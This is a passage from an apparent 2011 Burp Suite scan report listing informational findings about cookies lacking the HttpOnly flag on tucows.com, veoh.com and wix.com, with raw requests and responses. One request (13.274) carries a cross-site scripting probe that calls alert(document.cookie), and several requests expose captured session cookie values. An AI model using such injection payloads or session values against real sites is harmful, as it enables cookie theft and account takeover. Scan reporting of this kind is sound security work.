Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.269. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.270. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.271. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.272. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.273. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.274. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

13.275. http://www.tucows.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...

13.276. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:25:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...

13.277. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.278. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.279. http://www.tucows.com/software.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...

13.280. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.281. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

13.282. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

13.283. http://www.wix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wix.com
